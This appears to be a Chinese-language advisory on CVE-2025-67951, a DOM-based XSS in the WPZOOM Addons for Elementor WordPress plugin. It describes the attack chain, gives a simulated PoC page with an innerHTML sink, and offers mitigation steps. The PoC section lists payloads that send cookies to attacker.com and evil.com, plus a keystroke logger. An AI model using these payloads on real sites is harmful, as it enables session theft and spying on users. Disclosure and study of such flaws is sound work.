CVE-2025-67951 | WPZOOM Addons for Elementor DOM型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-67951

漏洞类型

DOM型XSS (跨站脚本攻击)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WPZOOM Addons for Elementor (wpzoom-elementor-addons)

漏洞概述

CVE-2025-67951是WordPress插件WPZOOM Addons for Elementor中存在的一个DOM型跨站脚本(XSS)漏洞。该漏洞由于Web应用程序在生成页面时未正确对用户输入进行中和处理，导致攻击者可以在受害者的浏览器中执行恶意JavaScript代码。漏洞影响版本从n/a至1.2.10（含）。攻击者可通过构造包含恶意脚本的链接，诱骗已认证的低权限用户点击，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。由于该漏洞属于DOM型XSS，恶意脚本在客户端浏览器中通过修改DOM环境而执行，传统的服务器端WAF可能难以检测。CVSS 3.1评分6.5，属于中等严重程度，需要用户交互和低权限认证才能利用。

技术细节

该漏洞存在于WPZOOM Addons for Elementor插件的JavaScript代码中。当插件处理用户输入时，未对特殊字符进行适当的HTML编码或转义，导致用户可控的数据被直接插入到DOM中。具体来说，攻击者可以通过URL参数或表单输入构造恶意脚本内容，插件的前端JavaScript代码将这些数据动态添加到页面DOM中而不进行安全处理。DOM型XSS的特点是漏洞代码完全在客户端执行，恶意负载不会经过服务器的输入验证流程。攻击者利用此漏洞可以读取页面内容、窃取用户凭证、修改页面显示内容或重定向用户到钓鱼站点。由于需要低权限用户点击恶意链接，受影响的主要是已登录的管理员或编辑角色用户。

攻击链分析

STEP 1

1

攻击者识别目标网站使用的WPZOOM Addons for Elementor插件版本（<= 1.2.10）

STEP 2

2

攻击者分析插件前端JavaScript代码，发现存在未过滤的用户输入点

STEP 3

3

攻击者构造包含恶意JavaScript代码的URL参数（如widget_data或id参数）

STEP 4

4

攻击者通过钓鱼邮件、社交工程或恶意网页诱骗低权限用户点击构造的链接

STEP 5

5

用户浏览器加载页面，插件JavaScript将恶意负载直接注入DOM并执行

STEP 6

6

恶意脚本窃取用户Cookie、会话令牌或其他敏感信息并发送到攻击者服务器

STEP 7

7

攻击者利用窃取的凭证劫持用户会话，执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-67951 PoC - DOM-based XSS in WPZOOM Addons for Elementor -->
<!-- This PoC demonstrates the DOM-based XSS vulnerability -->
<!-- Attack Scenario: Inject malicious JavaScript via URL parameter -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-67951 PoC</title>
</head>
<body>
    <h1>CVE-2025-67951 DOM-based XSS PoC</h1>
    <p>Vulnerable Parameter: The vulnerability exists in the frontend JavaScript of wpzoom-elementor-addons plugin.</p>
    
    <!-- Attack URL Example -->
    <h2>Attack URL:</h2>
    <pre id="attack-url"></pre>
    
    <script>
        // Simulate vulnerable code pattern in wpzoom-elementor-addons
        function simulateVulnerableCode() {
            // Get URL parameter without sanitization
            const params = new URLSearchParams(window.location.search);
            const userInput = params.get('widget_data') || params.get('id');
            
            // Vulnerable: Direct injection into DOM without encoding
            if (userInput) {
                document.getElementById('output').innerHTML = userInput;
            }
        }
        
        // Generate attack URL
        const attackPayload = '<img src=x onerror="alert(String.fromCharCode(88,83,83,32,69,120,112,108,111,105,116,101,100));"> ';
        const attackURL = window.location.origin + window.location.pathname + '?widget_data=' + encodeURIComponent(attackPayload);
        document.getElementById('attack-url').textContent = attackURL;
        
        // Execute PoC
        simulateVulnerableCode();
    </script>
    
    <!-- Alternative Attack Payloads -->
    <h2>Alternative Payloads:</h2>
    <pre>
1. Cookie Theft:
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

2. Session Hijacking:
<img src=x onerror="document.location='https://evil.com/log?cookie='+document.cookie">

3. Keylogger:
<script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}</script>
    </pre>
    
    <div id="output" style="margin: 20px; padding: 10px; border: 1px solid #ccc;"></div>
</body>
</html>

影响范围

WPZOOM Addons for Elementor <= 1.2.10

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制低权限用户使用Elementor相关功能；2) 在WAF规则中添加针对可疑XSS模式的检测；3) 提醒用户不要点击未知来源的链接；4) 启用WordPress的自动更新功能；5) 考虑暂时禁用WPZOOM Addons for Elementor插件直到安全更新可用；6) 监控日志中的异常请求模式。